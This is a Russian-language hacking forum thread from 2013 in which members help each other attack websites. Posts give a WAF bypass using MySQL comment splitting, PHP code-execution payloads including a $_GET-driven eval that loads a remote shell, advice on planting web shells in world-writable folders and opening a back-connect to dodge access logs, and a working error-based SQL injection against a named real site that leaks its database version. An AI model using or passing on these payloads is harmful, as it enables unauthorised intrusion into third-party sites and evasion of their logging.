Старый 12.03.2013, 10:33   #2771
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

что вы тут за бред пишете по поводу fr/**/om F/*!R*//*!O*/M ?
такая конструкция в mysql не работает т.к. ключевые слова нельзя разбивать.
это будет работать только в том случае, когда "кто-то" (обычно waf, как и сказал Beched) вырежет /**/ до того, как конструкция попадет в mysql
DrakonHaSh вне форума   Ответить с цитированием
Старый 12.03.2013, 10:48   #2772
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Цитата:
Сообщение от DrakonHaSh Посмотреть сообщение
что вы тут за бред пишете по поводу fr/**/om F/*!R*//*!O*/M ?
такая конструкция в mysql не работает т.к. ключевые слова нельзя разбивать.
это будет работать только в том случае, когда "кто-то" (обычно waf, как и сказал Beched) вырежет /**/ до того, как конструкция попадет в mysql
Хоть один нормальный комментарий.
А так это тоже самое, что рассуждать про актуальность дырок связанных с register_globals и удивляться, а почему их никто не юзает.
netcat вне форума   Ответить с цитированием
Старый 12.03.2013, 20:55   #2773
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

ребят,подсобите,плз...
есть уязвимость 'PHP Code execution'...
выполняются phpinfo(),system(ls) и т.д.....
слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64...но при вставке любых заглавных,редиректит на тот же url только со строчными символами и код не выполняется...
фильтр кавычек обходится,print(`ls -la`) выполняется...но фильтруется слэш и обратный слэш...

как можно залиться в данном случае?
QaRTiN вне форума   Ответить с цитированием
Старый 12.03.2013, 21:05   #2774
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

ну например eval(getenv(http_asd));
в хидере asd отправить нужный PHP код
Andrey1800 вне форума   Ответить с цитированием
Старый 12.03.2013, 21:15   #2775
TanK1sT
 
Регистрация: 06.12.2011
Сообщений: 2
Репутация: 0
По умолчанию

Цитата:
Сообщение от QaRTiN Посмотреть сообщение
ребят,подсобите,плз...
есть уязвимость 'PHP Code execution'...
выполняются phpinfo(),system(ls) и т.д.....
слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64...но при вставке любых заглавных,редиректит на тот же url только со строчными символами и код не выполняется...
фильтр кавычек обходится,print(`ls -la`) выполняется...но фильтруется слэш и обратный слэш...

как можно залиться в данном случае?
Можешь воспользоватся функцией chr (http://php.net/manual/ru/function.chr.php) - для обхода экранирования.
TanK1sT вне форума   Ответить с цитированием
Старый 13.03.2013, 23:45   #2776
rogatiy
 
Регистрация: 04.03.2013
Сообщений: 6
Репутация: 0
По умолчанию

Подниму свой вопрос.
Цитата:
Сообщение от rogatiy Посмотреть сообщение
Собснна, вопрос - где можно почитать про синтаксис PHP-инъекций в URL? К примеру, имеется у нас сайт N, а на этом сайте уязвимость /search/?name=, пропускающая PHP-инъекции, то есть запрос /search/?name={${phpinfo()}} выводит phpinfo, а больше я ничего и не могу, ибо синтаксиса не знаю.
В результате бурного гугления пришёл к такому инжекту: name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета, как залить шелл через эту дырку, благо теперь всё проще, MQ - уже не соперник. Заранее благодарен!
rogatiy вне форума   Ответить с цитированием
Старый 14.03.2013, 11:31   #2777
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

rogatiy парень, твои вопросы реально не уровень форума. А вообще все очень банально, грузи шелл без пароля в /tmp и далее инклудь его раз у тебя инъекция в GET. Либо через find ищи папки с правами на запись и записывай туда. На каждом втором сайте есть в корне sape и т.п. партнерки, права на папке всегда 777, так же в каждом третьем двиге используется файловый кэш, права тоже 777 ну и для загружаемых объектов часто права 777, то есть для папок типа upload и тд.
Вообще в таких случаях, если есть возможность исполнять команды, я в первую очередь делаю бэк-конект, ибо это проще всего и не следишь в access-логах своим шеллом.
b3 вне форума   Ответить с цитированием
Старый 14.03.2013, 13:48   #2778
elk
 
Регистрация: 07.03.2013
Сообщений: 19
Репутация: 1
По умолчанию

Цитата:
/search/?name={${phpinfo()}}
Собственно интересно, какой исходный код у файла, выдающего такое...
elk вне форума   Ответить с цитированием
Старый 14.03.2013, 22:46   #2779
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Помогите раскрутить SQL:
Код:
http://iskusnitsa.ru
POST:
action=search&area=search&search%5Bmult%5D=sadsad'
Тут как обычно много чего фильтруется, в таких случаях как правило помогает конструкция с `join` но через неё никак у меня не получается, как в таком случае во первых подобрать количество полей не понятно, но я начал крутить перебирая поля вслепую, вроде бы всё перебрал, на 26 поле он уже какую то другую ошибку стал выдавать, а не «не правильное количество полей», так и не удалось, кто поможет, буду благодарен.
netcat вне форума   Ответить с цитированием
Старый 15.03.2013, 03:43   #2780
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Цитата:
Сообщение от netcat Посмотреть сообщение
Помогите раскрутить SQL:
Код:
http://iskusnitsa.ru
POST:
action=search&area=search&search%5Bmult%5D=sadsad'
Тут как обычно много чего фильтруется, в таких случаях как правило помогает конструкция с `join` но через неё никак у меня не получается, как в таком случае во первых подобрать количество полей не понятно, но я начал крутить перебирая поля вслепую, вроде бы всё перебрал, на 26 поле он уже какую то другую ошибку стал выдавать, а не «не правильное количество полей», так и не удалось, кто поможет, буду благодарен.
Код:
http://iskusnitsa.ru/search/
POST: action=search&area=search&search[mult]='))or(1)group/**/by(mid(version(),rand(0)|0))having(avg(0))#
Error(1062): Duplicate entry '5.0.92' for key 1

Все просто и не надо мудрить, как Вы уже начали

Последний раз редактировалось cat1vo; 15.03.2013 в 03:52..
cat1vo вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot